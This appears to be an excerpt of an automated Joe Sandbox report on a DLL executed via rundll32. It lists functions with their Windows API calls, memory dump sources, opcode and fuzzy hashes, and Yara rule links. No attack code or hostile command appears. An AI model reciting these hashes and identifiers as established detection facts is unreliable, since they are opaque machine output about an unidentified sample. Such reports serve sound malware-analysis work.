                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,6C7CF117,?,6C7E1FB8,?,00000000), ref: 6C7CF087
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Locale$Info$Valid
                    • String ID:
                    • API String ID: 1826331170-0
                    • Opcode ID: 87101a597365729ab6e8668e4b568582d2b8cd4ce84ffbbae4aed188a5e50c23
                    • Instruction ID: a5a568c3f50faad70d5d3947abc6b23449635db143a79d26193ac57765debf33
                    • Opcode Fuzzy Hash: 87101a597365729ab6e8668e4b568582d2b8cd4ce84ffbbae4aed188a5e50c23
                    • Instruction Fuzzy Hash: E131AE30B0060AAFEB20DF54CE89BDEB7B9EB49705F1044A5A204A3A51D7355E84CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8F90B0 Relevance: 3.0, APIs: 2, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,6C8F914E,?,00000000,?,6C8F9168,?,6C8F99FD,00000000,6C8F9B11,?,00000000,00000001), ref: 6C8F90D0
                    • FormatMessageW.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,6C8F914E,?,00000000,?,6C8F9168,?,6C8F99FD,00000000), ref: 6C8F90F6
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: adb06608572c692a6b9832d18ee063737ee3361d1580048e1b98db2eafcc8cd4
                    • Instruction ID: dce918afe731187677a3d6bb53388a41589b3d3ce42bb62025c54253c5a972c3
                    • Opcode Fuzzy Hash: adb06608572c692a6b9832d18ee063737ee3361d1580048e1b98db2eafcc8cd4
                    • Instruction Fuzzy Hash: 2101F77020430A5EF721EE648F4DFDA73A8D749348F514871EA28D6B80EB756D458A25
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E9194 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000,6C9DB693,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C,6C9DBCE4), ref: 6C7E91AF
                    • GetLastError.KERNEL32(00000000,?,?,?,00000000,6C9DB693,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C,6C9DBCE4), ref: 6C7E91D4
                      • Part of subcall function 6C7E90F8: FileTimeToLocalFileTime.KERNEL32(?), ref: 6C7E912D
                      • Part of subcall function 6C7E90F8: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 6C7E9152
                      • Part of subcall function 6C7E9208: FindClose.KERNEL32(?,?,6C7E91D2,00000000,?,?,?,00000000,6C9DB693,6C9DB774,*.ex,?,00000000,6C9DB730), ref: 6C7E9214
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                    • String ID:
                    • API String ID: 976985129-0
                    • Opcode ID: ae8d658cb9dca52954db5bf4b32c2a0741df981a73e8bd2384a87140f4cccb2a
                    • Instruction ID: 872548dbf1c6bfa516833d8c1dad742ed4c3c6079e99389a400a74d3b0fea7c8
                    • Opcode Fuzzy Hash: ae8d658cb9dca52954db5bf4b32c2a0741df981a73e8bd2384a87140f4cccb2a
                    • Instruction Fuzzy Hash: 70E06D73B015200B4B049A7C5ECC5DA62C85B996F931603BAEC25EBB49DB35CC0A43E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E8C20 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,?,6C7E8CE7,00000000,?,?,00000000,6C7E8A82), ref: 6C7E8C3B
                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,6C7E8CE7,00000000,?,?,00000000,6C7E8A82), ref: 6C7E8C46
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: c322191b8235e33c611563e0b3466bb7e2885d0fa882784f604286618b765bae
                    • Instruction ID: 1948af77b6caba40cdfa4536d9a35b184637f0417c51241acdcc7af83fac2c4a
                    • Opcode Fuzzy Hash: c322191b8235e33c611563e0b3466bb7e2885d0fa882784f604286618b765bae
                    • Instruction Fuzzy Hash: ADE0C23260520816CB1086BC1E8D7EA738C2B4A328F100FE26D6CE2AE1EB36A55801A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C916A18 Relevance: .4, Instructions: 400COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7454c73a8daf9fdf62cf67afd7f68534e6af644ddd912e247d66b5113dfe8458
                    • Instruction ID: 9f49abf37f87fcf2b8e8f0ae5489e6b7ae78e5734d2197bddcd62c152f984d1d
                    • Opcode Fuzzy Hash: 7454c73a8daf9fdf62cf67afd7f68534e6af644ddd912e247d66b5113dfe8458
                    • Instruction Fuzzy Hash: D0F16C31F1410A8BDB08CF69D8916AEB7B2FF8D314F5A8179D516EB781CB34A941CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9097EC Relevance: 86.0, APIs: 1, Strings: 48, Instructions: 278libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(uxtheme.dll,00000000,6C909BB2,?,?,?,6C97D831,?,00000000,?,?,6C982C55,6C9833FE,6C97C8A8,00000000,6C97C955), ref: 6C909833
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundExtent$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                    • API String ID: 1029625771-1748089680
                    • Opcode ID: 9d40232eb234fd84e5a88e4fae7e98588a24d9ae05870883b115f9d2f78a9318
                    • Instruction ID: db1be3e871683824f60a28e5926a893ba15ff0c8e951e95803dacd8e42c554bb
                    • Opcode Fuzzy Hash: 9d40232eb234fd84e5a88e4fae7e98588a24d9ae05870883b115f9d2f78a9318
                    • Instruction Fuzzy Hash: B4A134B1A44690AFEF00DBA5CDC8A6537BCFB46204B024DA9B945CFA0CDB35E805CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B4ED0 Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 6C9B4F41
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 6C9B4F53
                    • GetClassLongW.USER32(00000000,000000E6), ref: 6C9B4F66
                    • SetWindowLongW.USER32(00000000,000000F0), ref: 6C9B4FA6
                    • SetWindowLongW.USER32(00000000,000000EC,?), ref: 6C9B4FBA
                    • SetClassLongW.USER32(00000000,000000E6,?), ref: 6C9B4FCE
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 6C9B5008
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 6C9B5020
                    • GetSystemMenu.USER32(00000000,000000FF,00000000,000000EC,?,?,00000000,000000EC,00000000,000000F0), ref: 6C9B502F
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037,00000000,000000EC,?,?,00000000,000000EC,00000000,000000F0), ref: 6C9B5058
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Long$Window$ClassMessageSend$MenuSystem
                    • String ID:
                    • API String ID: 494549727-0
                    • Opcode ID: 18ba2465e9e1831b6939bfc6b71a976be736482ac56f7f5f53ac7f9f237def30
                    • Instruction ID: e4269df3c779415949ce9442d3813ab32f56a17742a4d1b6f2f01740135ce1cf
                    • Opcode Fuzzy Hash: 18ba2465e9e1831b6939bfc6b71a976be736482ac56f7f5f53ac7f9f237def30
                    • Instruction Fuzzy Hash: E141C56030539076DB009A788D88BEB37594F5274CF145A39B499EBBD6CB79D80CC791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C97C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 64libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97D5
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 6C7C97DB
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97EE
                    • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97FB
                    • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,6C7C9874,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C9826
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 1184211438-79381301
                    • Opcode ID: bdd3833a443ec255e1b19aee5dfaa92f884c0f1df5fe0432009e21cb5d11c73d
                    • Instruction ID: bc65ca7ea2a9b6aed2655686fa01bb374471db2a8071c50e5a91fb9ae1c15400
                    • Opcode Fuzzy Hash: bdd3833a443ec255e1b19aee5dfaa92f884c0f1df5fe0432009e21cb5d11c73d
                    • Instruction Fuzzy Hash: E2118470F0420AEEDB80DBA6DA98A9DB7F9EF5431CF1085A5E414E7A40D735C684CB13
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7D2AE8 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 6C7D2BA0
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 5b3ec9703fa85bf261f160e13543ca55a26536603a91e92089ae923cf7b0deb7
                    • Instruction ID: c54eaa65479405428b612a29cbbc356cc5e924140ba7a91f20de91e148a0f99a
                    • Opcode Fuzzy Hash: 5b3ec9703fa85bf261f160e13543ca55a26536603a91e92089ae923cf7b0deb7
                    • Instruction Fuzzy Hash: 34A1A371A00309AFDB10DFA4DA89BDEB7B5BF48304F654529E914A7780DB70BD46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8F9D00 Relevance: 12.3, APIs: 8, Instructions: 267windowCOMMON
                    Download Yara Rule
                    APIs
                    • CreateIconIndirect.USER32(FFFFFFFF), ref: 6C8F9F03
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateIconIndirect
                    • String ID:
                    • API String ID: 1936033138-0
                    • Opcode ID: 21b54dad7d89fbd7be9bb2151d1dae4690175a41df52678bf4325a9985cfa2dd
                    • Instruction ID: 07d1bf881de2e01eb6b83c30d5482067cb4da39630ef729873ef2b634f6fd1c7
                    • Opcode Fuzzy Hash: 21b54dad7d89fbd7be9bb2151d1dae4690175a41df52678bf4325a9985cfa2dd
                    • Instruction Fuzzy Hash: 36B10271A002099FCB10DFA8C9849DEBBF9FF49348B2189A5E814EB751D731AD46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5F88 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
